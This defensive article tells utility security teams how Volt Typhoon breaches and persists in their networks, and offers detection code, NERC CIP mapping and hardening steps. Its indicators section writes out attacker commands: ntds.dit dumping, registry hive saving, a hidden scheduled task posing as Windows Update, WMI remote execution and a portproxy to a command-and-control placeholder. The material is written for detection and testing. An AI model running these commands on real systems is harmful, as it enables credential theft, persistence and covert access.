Unpatched Edge Devices are Volt Typhoon's Persistence Point

Strategies to Defend Utilities and Critical Infrastructure Against Volt Typhoon

Volt Typhoon has maintained undetected access to multiple electrical utilities for years; the breach of the Massachusetts-based Littleton Electric Light and Water Departments (LELWD) is the wake-up call. According to Dragos, the Chinese state-sponsored group sat in LELWD's network for more than 300 days, collecting operational technology data such as SCADA configurations and grid topology before it was detected: exactly the intelligence needed to plan cascading outages during a geopolitical crisis. CISA's February 2024 analysis reveals an even more concerning pattern: in some environments, Volt Typhoon has maintained persistent access for at least five years.

This article delivers evidence-based defensive strategies specifically tailored for electrical utility security teams facing this unprecedented threat. Most successful intrusions exploit unpatched edge devices and VPNs without multi-factor authentication.

The Threat Profile
Organizational Structure and Attribution

Volt Typhoon is assessed by CISA, NSA, FBI and their Five Eyes partners to be a PRC state-sponsored actor associated with the People's Liberation Army (PLA) cyber forces, conducting pre-positioning operations since at least 2019 (the joint advisories date observed activity to mid-2021, with access in some victims reaching back five years). The "Typhoon" suffix is Microsoft's naming convention for China-based actors, not a storm name. The group targets critical infrastructure almost exclusively, with a focus on pre-positioning for disruption rather than classic espionage.

What we know from CISA, NSA, and Five Eyes reporting:

Organizational Hierarchy
  • Parent Organization: PRC military cyber forces; the PLA Strategic Support Force created in the 2015 military reforms, whose cyber mission passed to the newly formed PLA Cyberspace Force when the Strategic Support Force was dissolved in April 2024
  • Operational Hours: activity patterns align with the Beijing timezone (UTC+8), peaking during Chinese business hours
  • Development Artifacts: code comments and debugging strings in recovered tooling are reported to be in Simplified Chinese
  • Infrastructure: leverages Chinese domestic hosting providers for initial staging, then pivots through compromised global infrastructure (the KV Botnet of end-of-life small-office routers)

The group carries a different name at each vendor: Volt Typhoon (Microsoft; formerly DEV-0391), Vanguard Panda (CrowdStrike), BRONZE SILHOUETTE (Secureworks), UNC3236 (Mandiant), Insidious Taurus (Unit 42) and VOLTZITE (Dragos, whose reporting covers the LELWD case).

Strategic Motivations

Unlike profit-driven ransomware operators or intelligence-gathering APTs, Volt Typhoon’s mission aligns with Chinese military doctrine:

Primary Objectives: pre-positioning for wartime operations, specifically creating leverage for Taiwan Strait crisis scenarios, deterring U.S. military intervention in Pacific conflicts, and demonstrating the ability to impose costs on the U.S. civilian population.

Doctrinal Basis: their targeting maps directly to Chinese military writings on "System Destruction Warfare", which emphasize:

  • Attacking critical nodes that cascade across systems
  • Timing attacks for maximum psychological impact
  • Creating domestic pressure to limit U.S. military options

Target Selection Logic

  • The focus on utilities isn't random: Chinese military doctrine identifies power grids as the foundation that every other critical infrastructure sector depends on. Water systems, the secondary target, create immediate humanitarian pressure.

Operational Characteristics

What makes Volt Typhoon unique is their patience and operational discipline. Unlike cybercrime actors wanting quick payoff, this team has:

  • No Financial Motivation - they have never deployed ransomware or sold access
  • No Commercial Data Theft - the data they collect (network diagrams, OT procedures, credentials) serves one purpose: understanding the target well enough to disrupt it later
  • Extreme Patience - five-year dwell times indicate strategic rather than tactical objectives
  • Limited Activity - after achieving persistence they often go dormant for months, surfacing only to refresh credentials or re-validate access

The human operators behind Volt Typhoon remain unnamed in public intelligence, as China’s military cyber units maintain strict operational security. But the group’s consistent tactics, techniques, and procedures (TTPs) suggest a stable, professional team with formal military training rather than loosely affiliated hackers.

Volt Typhoon became public in May 2023, when Microsoft and a joint Five Eyes advisory exposed a campaign against U.S. critical infrastructure that had been running since at least mid-2021; CISA's February 2024 advisory extended the known dwell time to five years. The FBI's court-authorized operation in January 2024 removed KV Botnet malware from hundreds of compromised U.S. routers, but the group immediately began rebuilding: Lumen's Black Lotus Labs watched it compromise roughly 30% of internet-exposed Cisco RV320/325 devices within 37 days. Confirmed victims range from a utility serving about 15,000 people to providers for major metropolitan areas.

Attack Chain Analysis

They gain initial access through unpatched, internet-facing edge devices, exploiting vulnerabilities such as CVE-2022-42475 (Fortinet FortiOS SSL-VPN) and CVE-2024-21887 (Ivanti Connect Secure), and end-of-life Cisco RV320/325 routers that will never receive a fix.

Once inside, they rely almost entirely on legitimate Windows administration tools (PowerShell, WMI, RDP), so nothing they do looks like malware and detection is nearly impossible without comprehensive logging. Their living-off-the-land (LOTL) toolkit, as catalogued by CISA, includes:

  • Core tools: cmd, certutil, dnscmd, ldifde, makecab, net user/group/use, netsh, nltest, netstat, ntdsutil, ping, PowerShell, quser, reg query/reg save, systeminfo, tasklist, wevtutil, whoami, wmic, xcopy
  • Specialized reconnaissance: They steal domain controller backups using ntdsutil.exe, harvest stored credentials from PuTTY profiles containing substation connections, then establish persistence through scheduled tasks mimicking Windows Update
  • Critical browser targeting pattern: Volt Typhoon specifically accesses Chrome credential stores:
    • C:\Users\{user}\AppData\Local\Google\Chrome\User Data\Local State (AES keys)
    • C:\Users\{user}\AppData\Local\Google\Chrome\User Data\Default\Login Data

They stage data for exfiltration in predictable locations:

  • C:\Windows\Temp\tmp\Active Directory\
  • C:\Users\Public\pro\
  • C:\Windows\Temp\tmp\registry\

Their KV Botnet, built from end-of-life small-office routers, is the proxy infrastructure that hides operator traffic in residential address space; after the January 2024 takedown the operators compromised roughly 30% of internet-exposed Cisco RV320/325 devices in 37 days while rebuilding it. They specifically target the IT/OT boundary, exfiltrating relay configurations, SCADA system data and emergency response procedures. There are no demands, financial or otherwise: the goal is sustained access that can be activated during a Taiwan contingency, which U.S. assessments project as early as 2027.

The bad news is that traditional security tools fail against living-off-the-land techniques because every action is a legitimate command run by a legitimate account. The good news is that CISA's February 2024 advisory (AA24-038A) documents specific detection techniques that have proven effective.

Technical Indicators
1. Initial Access Vectors (most intrusions)

# Common exploitation targets
CVE-2022-42475 - Fortinet FortiOS heap overflow
CVE-2024-21887 - Ivanti Connect Secure command injection  
CVE-2023-46805 - Ivanti authentication bypass
End-of-Life: Cisco RV320/325, Netgear ProSAFE

2. Living-Off-The-Land Commands
# Common PowerShell reconnaissance pattern (the first line is verbatim from the CISA advisory)
Get-EventLog security -instanceid 4624 -after [date] | fl * | Out-File 'C:\users\public\documents\user.dat'
(Get-ADDomain).ReplicaDirectoryServers
Get-ADComputer -Filter {OperatingSystem -like "*Server*"}
Get-NetTCPConnection -State Listen

# Credential harvesting (ntdsutil copies ntds.dit through a volume shadow copy; all three need administrative rights)
ntdsutil "activate instance ntds" "ifm" "create full C:\temp" quit quit
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Persistence mechanisms (task name chosen to blend in; the payload after -c is elided)
schtasks /create /tn "Windows Update" /tr "powershell.exe -w hidden -c IEX" /sc daily /ru SYSTEM

3. Network Movement Patterns
# Lateral movement via WMI
wmic /node:SCADA-HMI process call create "cmd.exe /c powershell.exe"

# Data staging for exfiltration
7z.exe a -pPASSWORD archive.7z \\OT-Network\SCADA\*.conf
certutil -encode archive.7z archive.txt

# Proxy establishment through compromised routers
netsh interface portproxy add v4tov4 listenport=443 connectaddress=<C2>

4. Critical Windows Event IDs for Detection

Application Log (provider: ESENT)

  • Event ID 216: Database location change from normal NTDS.dit path to shadow copy
  • Event ID 325: New database creation in C:\Windows\Temp\tmp\Active Directory\ntds.dit
  • Event ID 326: NTDS.dit mounting from volume shadow copy process
  • Event ID 327: Database detachment (credential dumping completion)
  • Event ID 637: New flush map file creation for NTDS.dit operations

Security/System Logs

  • Event ID 1102: Security log cleared (immediate investigation required)
  • Event ID 4624: Successful logon events (monitor for patterns)

RDP Logs (Microsoft-Windows-TerminalServices-LocalSessionManager/Operational)

  • Event ID 21: RDP session logon succeeded
  • Event ID 22: Shell start notification (new RDP session)
  • Event ID 25: Session reconnection
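The indicators above turned into detection logic, as an added example (it is not code from the original page or from CISA). It runs over Windows events exported as JSON records; the field names (timestamp, channel, provider, event_id, logon_type, message, command_line, target_path) are this example's own assumption about an export shape, roughly what a winlogbeat or Wazuh agent produces, not a standard. It flags the ESENT ntds.dit events, log clearing, the LOTL command lines, the staging directories and Chrome credential paths, and gives a low-severity score to remote logons that land inside Beijing business hours. The sample events are constructed.

```python
import re
from datetime import datetime, timedelta, timezone

# Indicators drawn from the sections above (CISA AA24-038A).
NTDS_ESENT_IDS = {216, 325, 326, 327, 637}   # Application log, provider ESENT
RDP_IDS = {21, 22, 25}                        # TerminalServices-LocalSessionManager
STAGING_DIRS = (r"c:\windows\temp\tmp\active directory",
                r"c:\users\public\pro",
                r"c:\windows\temp\tmp\registry")
CHROME_CRED_RE = re.compile(
    r"\\appdata\\local\\google\\chrome\\user data\\(local state|default\\login data)", re.I)
# Living-off-the-land command lines (Security 4688 or Sysmon Event ID 1).
LOTL_PATTERNS = {
    "ntds_dump": re.compile(r"ntdsutil.*(ifm|create full)", re.I),
    "hive_save": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)", re.I),
    "portproxy": re.compile(r"netsh\s+interface\s+portproxy\s+add", re.I),
    "wmi_remote_exec": re.compile(r"wmic\s+/node:.*process\s+call\s+create", re.I),
    "logon_log_harvest": re.compile(r"get-eventlog\s+security.*4624", re.I),
    "fake_update_task": re.compile(r"schtasks\s+/create.*windows update", re.I),
    "certutil_encode": re.compile(r"certutil.*-encode", re.I),
}
BEIJING = timezone(timedelta(hours=8))
SEVERITY_ORDER = ["info", "low", "high", "critical"]


def in_beijing_business_hours(ts: str) -> bool:
    """True when an ISO-8601 UTC timestamp falls on Mon-Fri 09:00-18:00 in UTC+8."""
    t = datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(BEIJING)
    return t.weekday() < 5 and 9 <= t.hour < 18


def evaluate(event: dict) -> list:
    """Return [(rule_name, severity), ...] for one exported event."""
    hits = []
    channel = event.get("channel", "").lower()
    provider = event.get("provider", "").lower()
    eid = event.get("event_id")
    msg, cmd, target = (event.get(k, "") for k in ("message", "command_line", "target_path"))

    if channel == "application" and provider == "esent" and eid in NTDS_ESENT_IDS \
            and "ntds.dit" in msg.lower():
        hits.append(("ntds_dit_shadow_copy_dump", "critical"))
    if channel == "security" and eid == 1102:
        hits.append(("security_log_cleared", "critical"))
    # Network (3) and RemoteInteractive (10) logons during the operators' working day.
    if channel == "security" and eid == 4624 and event.get("logon_type") in (3, 10) \
            and in_beijing_business_hours(event["timestamp"]):
        hits.append(("remote_logon_in_utc8_business_hours", "low"))
    if "terminalservices-localsessionmanager" in channel and eid in RDP_IDS:
        hits.append(("rdp_session_activity", "info"))
    for name, rx in LOTL_PATTERNS.items():
        if rx.search(cmd):
            hits.append((f"lotl_{name}", "high"))
    text = " ".join((target, cmd, msg)).lower()   # paths show up in any of the three
    if any(d in text for d in STAGING_DIRS):
        hits.append(("known_staging_directory", "high"))
    if CHROME_CRED_RE.search(text):
        hits.append(("chrome_credential_store_access", "high"))
    return hits


def scan(events: list) -> list:
    """[(index, hits)] for every event that matched at least one rule."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]


def highest_severity(events: list) -> str:
    """Worst severity across a batch, or 'none' if nothing matched."""
    sev = [s for _, hits in scan(events) for _, s in hits]
    return max(sev, key=SEVERITY_ORDER.index) if sev else "none"


# Constructed sample export for one host on Tuesday 2024-03-12 (assumed field names).
SAMPLE_EVENTS = [
    {"timestamp": "2024-03-12T03:15:00Z", "channel": "Security", "event_id": 4624,
     "logon_type": 10, "message": "An account was successfully logged on."},
    {"timestamp": "2024-03-12T03:16:10Z", "channel": "Security", "event_id": 4688,
     "command_line": 'ntdsutil "activate instance ntds" "ifm" '
                     '"create full C:\\Windows\\Temp\\tmp\\Active Directory" quit quit'},
    {"timestamp": "2024-03-12T03:16:12Z", "channel": "Application", "provider": "ESENT",
     "event_id": 325, "message": "The database engine created a new database at "
                                 "C:\\Windows\\Temp\\tmp\\Active Directory\\ntds.dit."},
    {"timestamp": "2024-03-12T03:20:00Z", "channel": "Microsoft-Windows-Sysmon/Operational",
     "event_id": 1, "command_line": 'cmd.exe /c copy "C:\\Users\\alice\\AppData\\Local\\Google'
                                    '\\Chrome\\User Data\\Default\\Login Data" C:\\Users\\Public\\pro\\ld'},
    {"timestamp": "2024-03-12T03:25:00Z", "channel": "Microsoft-Windows-Sysmon/Operational",
     "event_id": 1, "command_line": "netsh interface portproxy add v4tov4 listenport=443 "
                                    "connectaddress=198.51.100.7"},
    {"timestamp": "2024-03-12T03:30:00Z", "channel": "Security", "event_id": 1102,
     "message": "The audit log was cleared."},
    {"timestamp": "2024-03-12T14:00:00Z", "channel": "Security", "event_id": 4624,
     "logon_type": 10, "message": "An account was successfully logged on."},  # 22:00 Beijing
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
    print("worst:", highest_severity(SAMPLE_EVENTS))
```

The business-hours rule is deliberately low severity: a remote logon at 11:00 Beijing time is 22:00 Eastern, unusual for a utility but not impossible, so it should raise the score of an account rather than page anyone on its own. The command-line rules assume process creation auditing with command-line capture (or Sysmon Event ID 1), which is off by default on Windows.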

NERC CIP Alignment

Four NERC CIP requirements, three from CIP-005-7 and one from CIP-007-6, directly counter Volt Typhoon tactics:

Electronic Security Perimeter (CIP-005-7 R1)

Identify and protect all access points to Bulk Electric System (BES) Cyber Systems. Review every external connection, validate business justification, and implement deny-by-default rules.

Interactive Remote Access (CIP-005-7 R2)

Multi-factor authentication for all Interactive Remote Access to high and medium impact BES Cyber Systems (Part 2.3). Go beyond the minimum: hardware tokens or certificate-based authentication, since SMS and push-based MFA remain vulnerable to phishing and prompt-fatigue attacks.

Vendor Remote Access Management (CIP-005-7 R2, Parts 2.4 and 2.5)

Be able to see every active vendor remote-access session and terminate it on demand. Volt Typhoon specifically targets MSP and vendor connections, as in the LELWD breach, which came through the utility's Fortinet provider.

System Logging (CIP-007-6 R4)

Generate logs for all authentication attempts and administrative actions, alert on detected malicious activity, retain logs for at least 90 calendar days (Part 4.3) and review summaries at least every 15 calendar days (Part 4.4). Forwarding to a SIEM in near real time is what makes that review practical.

Quick Defensive Actions
Easy-ish
  • Enable PowerShell script block logging (the policy key does not exist by default, so create it first; module logging is worth enabling the same way)
    • New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
    • Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
  • Monitor for NTDS extraction attempts (the ESENT events fire when ntds.dit is copied through a volume shadow copy)
    • Get-WinEvent -FilterHashtable @{LogName='Application';ProviderName='ESENT';ID=216,325,326,327,637} | Where-Object {$_.Message -like "*ntds*"}
  • Deploy Sysmon for process, network and file-creation visibility
    • sysmon64 -accepteula -i sysmonconfig-export.xml
More involved but free-ish
  • Deploy Wazuh open-source SIEM (Debian/Ubuntu manager install; apt-key is deprecated, so the signing key goes into a keyring)
    • curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    • echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/4.x/apt/ stable main" | tee /etc/apt/sources.list.d/wazuh.list
    • apt-get update && apt-get install wazuh-manager
    • systemctl daemon-reload && systemctl enable --now wazuh-manager
    • Security Configuration Assessment (the CIS benchmark checks) runs on agents by default; confirm it in the sca block of /var/ossec/etc/ossec.conf
  • Firewalled network segmentation (deny by default between zones; OT has no route to the internet)
    • OT_NETWORK: 10.10.0.0/16 (no internet access)
    • DMZ_NETWORK: 10.20.0.0/16 (historian, HMI)
    • IT_NETWORK: 10.30.0.0/16 (business systems)
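A check that the rule set enforcing that segmentation actually says what you think, added here as an example (not code from the original page). Firewall rules are modelled as (source CIDR, destination CIDR, port, action) tuples evaluated first-match with an implicit deny, and the zone policy is that IT may never initiate into OT and OT may initiate to nothing but the DMZ. The rule format, the per-zone allowed directions and the sample rules are this example's assumptions.

```python
from ipaddress import ip_address, ip_network

# The three zones from the list above.
ZONES = {
    "OT": ip_network("10.10.0.0/16"),
    "DMZ": ip_network("10.20.0.0/16"),
    "IT": ip_network("10.30.0.0/16"),
}
# Zones each zone may initiate connections to (assumed policy). Anything absent,
# including INTERNET, is forbidden; that is the deny-by-default of CIP-005 R1.
ALLOWED_DIRECTIONS = {
    "OT": {"OT", "DMZ"},
    "DMZ": {"DMZ", "OT"},
    "IT": {"IT", "DMZ", "INTERNET"},
}


def zones_covered(cidr: str) -> set:
    """Zones a CIDR touches, plus INTERNET if it is not wholly inside one of ours."""
    net = ip_network(cidr)
    covered = {name for name, zone in ZONES.items() if zone.overlaps(net)}
    if not any(net.subnet_of(zone) for zone in ZONES.values()):
        covered.add("INTERNET")
    return covered


def decision(rules: list, src: str, dst: str, port: int) -> str:
    """First matching rule wins; no match means deny."""
    s, d = ip_address(src), ip_address(dst)
    for r_src, r_dst, r_port, action in rules:
        if s in ip_network(r_src) and d in ip_network(r_dst) and r_port in ("*", port):
            return action
    return "deny"


def violations(rules: list) -> list:
    """Allow rules whose source zone may not initiate to some zone the destination covers."""
    bad = []
    for rule in rules:
        r_src, r_dst, _, action = rule
        if action != "allow":
            continue
        for src_zone in zones_covered(r_src):
            if src_zone == "INTERNET":
                continue  # inbound from outside is governed by the ESP access-point rules
            if zones_covered(r_dst) - ALLOWED_DIRECTIONS[src_zone]:
                bad.append(rule)
                break
    return bad


# Constructed sample rule set: two legitimate flows and two that Volt Typhoon would love.
SAMPLE_RULES = [
    ("10.20.0.0/16", "10.10.0.0/16", 502, "allow"),   # historian polls PLCs (Modbus/TCP)
    ("10.30.0.0/16", "10.20.0.0/16", 443, "allow"),   # business users read the historian web UI
    ("10.30.0.0/16", "10.10.0.0/16", 3389, "allow"),  # BAD: RDP straight from IT into OT
    ("10.10.0.0/16", "0.0.0.0/0", "*", "allow"),      # BAD: OT can reach the internet (and IT)
]
HARDENED_RULES = [r for r in SAMPLE_RULES if r not in violations(SAMPLE_RULES)]

if __name__ == "__main__":
    for rule in violations(SAMPLE_RULES):
        print("violates zone policy:", rule)
    print("IT->OT RDP after hardening:", decision(HARDENED_RULES, "10.30.4.20", "10.10.1.10", 3389))
```

Run it against an export of the real rule base before each change window; the nmap check further down confirms the same thing from the outside, but this catches the over-broad destination (0.0.0.0/0) that a port scan from one subnet never exercises.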

Testing Your Defenses
# Core techniques (run in a lab or a change-controlled window; every test supports -CheckPrereqs and -Cleanup)
Invoke-AtomicTest T1087.001 -TestNumbers 1,2,3  # Local Account Discovery (net user, quser)
Invoke-AtomicTest T1003.003 -TestNumbers 1      # NTDS.dit extraction via ntdsutil (should raise ESENT 216/325/326/327)
Invoke-AtomicTest T1003.001 -TestNumbers 2      # LSASS memory dump via comsvcs.dll MiniDump (their observed method)
Invoke-AtomicTest T1654 -TestNumbers 1          # Log Enumeration (Get-EventLog security, as in the CISA advisory)
Invoke-AtomicTest T1059.001 -TestNumbers 1,2    # PowerShell execution
Invoke-AtomicTest T1047 -TestNumbers 1          # WMI execution
Invoke-AtomicTest T1070.001 -TestNumbers 1      # Clear Windows Event Logs (should raise Event ID 1102)
Invoke-AtomicTest T1057 -TestNumbers 1          # Process Discovery (tasklist /v)
Invoke-AtomicTest T1012 -TestNumbers 1          # Query Registry (where PuTTY session data lives)
Invoke-AtomicTest T1555.003 -TestNumbers 1      # Credentials from Web Browsers (Chrome Login Data)

# Network-based tests
Invoke-AtomicTest T1021.001 -TestNumbers 1      # RDP for lateral movement (should raise Event IDs 21/22/25)
Invoke-AtomicTest T1046 -TestNumbers 1          # Network Service Discovery

# Test network segmentation
nmap -sS -p 445,3389,22,23 <ot network>/24      # Run from the IT network; every port should come back filtered
Recovery Planning Assumptions

The December 2024 Dragos report confirms Volt Typhoon maintains access to multiple U.S. grids simultaneously. Recent analysis shows dwell times extending to five years or more. Plan for scenarios where:

  • Attackers possess Domain Admin privileges for 300+ days
  • Primary and backup domain controllers are compromised
  • Adversary understands your grid topology better than junior operators
  • Multiple utilities face simultaneous attacks during geopolitical crisis
  • Normal communication channels (email, VoIP) are unavailable
  • Browser-stored credentials for critical systems are compromised

Reality Check

The electrical utility threat from Chinese pre-positioning operations is active, persistent, and specifically targeting organizations exactly like yours. The Littleton Electric incident demonstrates both the feasibility of long-term persistent access and the intelligence value of operational technology data.

Driving up the cost for Volt Typhoon operators takes disciplined implementation of authentication controls, network segmentation, comprehensive logging and offline backups. The specific detections that pay off first:

  • Chrome credential store monitoring
  • Known staging directory surveillance
  • Proxy detection on the network, for example the free gait Zeek package
  • Comprehensive PowerShell and WMI logging
  • Open source tooling such as Wazuh (SIEM) and Zeek (network monitoring)
  • Application Log monitoring for ESENT Events 216, 325, 326, 327 and 637

The convergence of NERC CIP requirements and proven defensive techniques provides a prescriptive roadmap. Every control in the CIP-005-7 standard directly counters observed Volt Typhoon tactics.

Granted, nation-state actors typically achieve their goals; see James Mickens's classic "This World of Ours" essay on real-world threat models.

Implement fundamental controls before geopolitical events activate pre-positioned access. With focused effort on the fundamentals outlined here, you can achieve that with your budget and resources.
